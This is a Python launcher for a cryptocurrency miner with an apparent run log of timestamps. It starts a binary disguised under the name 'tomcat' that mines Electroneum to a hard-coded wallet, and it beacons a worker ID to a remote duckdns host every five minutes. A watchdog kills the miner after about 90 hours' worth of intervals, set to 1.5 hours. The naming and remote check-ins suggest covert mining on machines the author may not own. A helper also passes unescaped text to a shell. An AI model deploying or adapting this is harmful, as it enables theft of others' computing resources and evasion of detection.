import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:06.994090
#2018-02-17 16:47:02.095462
#2018-02-17 18:34:06.496731
#2018-02-17 20:22:06.660020
#2018-02-17 22:09:07.033195
#2018-02-17 23:54:07.688290
#2018-02-18 01:44:07.594032
#2018-02-18 03:32:06.219960
#2018-02-18 05:19:04.055459
#2018-02-18 07:12:04.815322
#2018-02-18 08:59:06.287187
#2018-02-18 10:46:01.680757
#2018-02-18 12:34:06.055349
#2018-02-18 14:21:06.304116
#2018-02-18 16:12:04.627316
#2018-02-18 18:00:01.828334
#2018-02-18 19:47:06.072785
#2018-02-18 21:32:01.998447
#2018-02-18 23:21:01.589732
#2018-02-19 01:08:06.098579
#2018-02-19 02:54:05.484951
#2018-02-19 04:40:07.288090
#2018-02-19 06:24:05.139034
#2018-02-19 08:13:06.651454
#2018-02-19 10:03:08.296910
#2018-02-19 11:52:07.174044
#2018-02-19 13:39:09.901726
#2018-02-19 15:28:04.920225
#2018-02-19 17:15:09.053972
#2018-02-19 19:03:08.053281
#2018-02-19 20:49:05.382411
#2018-02-19 22:37:04.350361
#2018-02-20 00:21:08.279542
#2018-02-20 02:10:08.706958
#2018-02-20 04:01:06.805716
#2018-02-20 05:45:06.757608
#2018-02-20 07:31:07.231656
#2018-02-20 09:16:03.376624
#2018-02-20 10:59:06.920662
#2018-02-20 12:47:08.103401
#2018-02-20 14:32:08.235158
#2018-02-20 16:16:03.191440
#2018-02-20 18:04:10.896710
#2018-02-20 19:55:05.578164
#2018-02-20 21:43:02.074054
#2018-02-20 23:24:06.837539
#2018-02-21 01:09:06.340295
#2018-02-21 02:57:06.550253
#2018-02-21 04:45:08.356946
#2018-02-21 06:31:03.491094
#2018-02-21 08:16:04.133470
#2018-02-21 10:02:01.352890
#2018-02-21 11:51:16.630445
#2018-02-21 13:42:11.069903
#2018-02-21 15:26:08.036399
#2018-02-21 17:18:10.060567
#2018-02-21 19:06:08.108189
#2018-02-21 20:53:01.407008
#2018-02-21 22:41:01.718393
#2018-02-22 00:29:01.574720
#2018-02-22 02:17:01.428282
#2018-02-22 04:04:06.073805
#2018-02-22 05:50:06.483154
#2018-02-22 07:35:06.751326
#2018-02-22 09:24:01.781446
#2018-02-22 11:10:01.267215
#2018-02-22 12:57:07.928316
#2018-02-22 14:45:10.277834
#2018-02-22 16:31:06.664067
#2018-02-22 18:16:10.234332
#2018-02-22 20:07:01.648722
#2018-02-22 21:56:07.050647
#2018-02-22 23:43:08.138626
#2018-02-23 01:31:06.953580
#2018-02-23 03:18:05.784797
#2018-02-23 05:05:08.563678
#2018-02-23 06:50:08.627931
#2018-02-23 08:40:08.665024
#2018-02-23 10:54:07.927998
#2018-02-23 12:51:04.195053
#2018-02-23 14:36:07.516323
#2018-02-23 16:27:06.241902
#2018-02-23 18:16:05.684559
#2018-02-23 20:01:03.481379
#2018-02-23 21:45:04.039994
#2018-02-23 23:38:07.232348
#2018-02-24 01:28:03.112696
#2018-02-24 03:19:07.440214
#2018-02-24 05:05:01.672078
#2018-02-24 06:53:06.665796
#2018-02-24 08:43:04.927856
#2018-02-24 10:27:06.203745
#2018-02-24 12:22:07.305962
#2018-02-24 14:16:07.671724
#2018-02-24 16:02:03.768089
#2018-02-24 17:54:07.424842
#2018-02-24 19:41:07.387132
#2018-02-24 21:28:04.071161
#2018-02-25 00:12:06.742927
#2018-02-25 03:21:08.040765
#2018-02-25 07:02:05.052739